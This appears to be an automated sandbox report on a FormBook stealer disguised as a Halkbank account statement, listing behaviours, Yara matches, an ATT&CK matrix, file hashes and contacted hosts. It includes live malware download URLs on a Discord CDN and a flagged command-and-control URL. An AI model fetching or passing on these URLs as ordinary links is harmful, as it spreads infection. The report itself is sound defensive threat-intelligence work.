Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	112 Process Injection	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	112 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Halkbank_Ekstre_20220128_081138_756957 (1).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\verify.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.healthonline.store/po6r/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.healthonline.store/po6r/	true	Avira URL Cloud: malware	low
https://cdn.discordapp.com/attachments/913584216825028612/936582704412110848/Cszji.jpg	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://github.com/mgravell/protobuf-net	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-neti	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931638980.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.discordapp.com	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931476656.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-netJ	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931476656.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.810240160.0000000004A6E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.130.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562454
Start date:	28.01.2022
Start time:	22:12:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Halkbank_Ekstre_20220128_081138_756957 (1).exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/7@1/1
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 21% (good quality ratio 19.4%) Quality average: 69% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 310 Number of non-executed functions: 11
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target Halkbank_Ekstre_20220128_081138_756957 (1).exe, PID 3496 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:14:15	API Interceptor	1x Sleep call for process: powershell.exe modified
22:15:22	API Interceptor	1x Sleep call for process: Halkbank_Ekstre_20220128_081138_756957 (1).exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.130.233	MSQNZmmg2F.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
	b7cwlpwH6S.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Noua lista de comenzi.exe	Get hash	malicious	Browse	162.159.134.233
	gD57NpzpaB.exe	Get hash	malicious	Browse	162.159.134.233
	fKipbTnBKG.exe	Get hash	malicious	Browse	162.159.133.233
	3D41425DAA1E1844BE0539723042DC532A640E5BA9EF9.exe	Get hash	malicious	Browse	162.159.134.233
	Transfer h#U0131zl#U0131 kopyas#U0131 pdf.exe	Get hash	malicious	Browse	162.159.129.233
	Proforma Fatura ektedir.exe	Get hash	malicious	Browse	162.159.133.233
	PI02627625141.PDF.exe	Get hash	malicious	Browse	162.159.133.233
	God of War.exe	Get hash	malicious	Browse	162.159.129.233
	U prilogu je predracun.exe	Get hash	malicious	Browse	162.159.129.233
	TRANSFER schnell pdf.exe	Get hash	malicious	Browse	162.159.133.233
	Divit-RekutPO260122.exe	Get hash	malicious	Browse	162.159.130.233
	C082990403156E860FC5397A9D28D44325BCB24D24A97.exe	Get hash	malicious	Browse	162.159.135.233
	conocimiento de embarque y factura comercial.XLSx.exe	Get hash	malicious	Browse	162.159.129.233
	nueva lista de pedidos n.#U00ba 002622.exe	Get hash	malicious	Browse	162.159.129.233
	e83EtnbjDD.exe	Get hash	malicious	Browse	162.159.134.233
	PO - Drawings And Specifications Sheet_pdf.scr.exe	Get hash	malicious	Browse	162.159.133.233
	4hjhPZknJq.exe	Get hash	malicious	Browse	162.159.134.233
	tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs	Get hash	malicious	Browse	162.159.133.233
	47DB202A3DEEF7AB702BF1D5C2E1451ACF5A46F2EA6AD.exe	Get hash	malicious	Browse	162.159.130.233
	setup_installer.exe	Get hash	malicious	Browse	162.159.130.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	80_513972285.xls	Get hash	malicious	Browse	172.67.149.209
	DETAILS-145.xls	Get hash	malicious	Browse	172.67.149.209
	DHL waybill invoice.exe	Get hash	malicious	Browse	104.21.19.200
	QRT_4_377305.htm	Get hash	malicious	Browse	104.21.41.23
	Noua lista de comenzi.exe	Get hash	malicious	Browse	162.159.134.233
	Halkbank,pdf.exe	Get hash	malicious	Browse	188.114.96.7
	Microsoft voicemail (1).html	Get hash	malicious	Browse	104.16.168.82
	triage_dropped_file.exe	Get hash	malicious	Browse	104.21.22.47
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	104.16.19.94
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	104.16.19.94
	HIRE SOA FOR DEC_2021.exe	Get hash	malicious	Browse	104.21.86.185
	Mail_27012022.xls	Get hash	malicious	Browse	104.21.78.179
	CHINESE NEW YEAR SHUT DOWN MEMO.exe	Get hash	malicious	Browse	188.114.97.7
	396180999746067.xlsm	Get hash	malicious	Browse	104.21.19.200
	zlT9om3A7R.exe	Get hash	malicious	Browse	104.21.3.248
	gD57NpzpaB.exe	Get hash	malicious	Browse	162.159.134.233
	f3mBsmzA6O.exe	Get hash	malicious	Browse	172.67.188.154
	#U00d6demenin kopyas#U0131_(Ref_27-01-2022)_Sadtek.exe	Get hash	malicious	Browse	104.21.3.168
	REMITTANCE ADVICE, Payment 0643000.html	Get hash	malicious	Browse	104.16.19.94
	yt64cMMhTw.exe	Get hash	malicious	Browse	104.20.138.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Sat#U0131nalma Sipari#U015fi -AR95647,pdf.exe	Get hash	malicious	Browse	162.159.130.233
	Halkbank,pdf.exe	Get hash	malicious	Browse	162.159.130.233
	modmenu_by_1h#U0410ck.exe	Get hash	malicious	Browse	162.159.130.233
	SNO22 PriceLetter595406_RACX-159814.exe	Get hash	malicious	Browse	162.159.130.233
	Diesel EXP.exe	Get hash	malicious	Browse	162.159.130.233
	Invoice4334567.htm	Get hash	malicious	Browse	162.159.130.233
	860e50.exe	Get hash	malicious	Browse	162.159.130.233
	yt64cMMhTw.exe	Get hash	malicious	Browse	162.159.130.233
	qgMcnt4meR.exe	Get hash	malicious	Browse	162.159.130.233
	8MnPvBzj15jLYOx.exe	Get hash	malicious	Browse	162.159.130.233
	Invoice.exe	Get hash	malicious	Browse	162.159.130.233
	Attachments.exe	Get hash	malicious	Browse	162.159.130.233
	#U266c VM_420419.htm	Get hash	malicious	Browse	162.159.130.233
	MEmu-setup-abroad-sdk.exe	Get hash	malicious	Browse	162.159.130.233
	QuotePDF.vbs	Get hash	malicious	Browse	162.159.130.233
	Divit-RekutPO260122.exe	Get hash	malicious	Browse	162.159.130.233
	conocimiento de embarque y factura comercial.XLSx.exe	Get hash	malicious	Browse	162.159.130.233
	Attachments.exe	Get hash	malicious	Browse	162.159.130.233
	nueva lista de pedidos n.#U00ba 002622.exe	Get hash	malicious	Browse	162.159.130.233
	EasyCheat.exe	Get hash	malicious	Browse	162.159.130.233

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20220128_081138_756957 (1).exe.log

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	936
Entropy (8bit):	5.362425814220162
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7r1qE4j:MxHKXwYHKhQnoPtHoxHhAHKzvr1qHj
MD5:	AC79CED5A2CDA485B5FCA7365DDFC804
SHA1:	B089977F0BE53E56517AAC414F3DC0B5D2AFE198
SHA-256:	A5144269866791DA4939ABCC6C5A97B898655D21807B2F0B5CAA177439FAB481
SHA-512:	300C0BAE54247E706D2B139B1AC0E670D361A6DA6748E12A16E00462A571958A34B9E185B633C6F2AFD089861F0278223AB3E80B6222D893AD1B61C19AE111CE
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	12872
Entropy (8bit):	5.532589155084153
Encrypted:	false
SSDEEP:	192:itHdLvFiW3I9OKxjge/xF9I9LuocX+8M0pSBuJs5mwRGSKoa/tCyulDqgaFa5rz:it95ikI9OAxk9q+RwSBKnkkulGgGIz
MD5:	D57782985CAE42AD44017C1D0357A773
SHA1:	DA1733F5CF096540BA418A67D77E9E93B70EDCEB
SHA-256:	CC16500C8B60BA9590248DD8252A77F1358377EC62A959701A3BA696EB542825
SHA-512:	3D71A3A2ACA0D76833FB476B0997C64656F42DE9FA2A26C426B6D02B2F723AC7799F678A009DC43ED439D38C21D726EF514190C1650535E40FAFAC8ACB930656
Malicious:	false
Reputation:	low
Preview:	@...e...................................1............@..........H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)M.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@..g@...@...@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_425bqlqm.lt5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhlga21j.a31.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
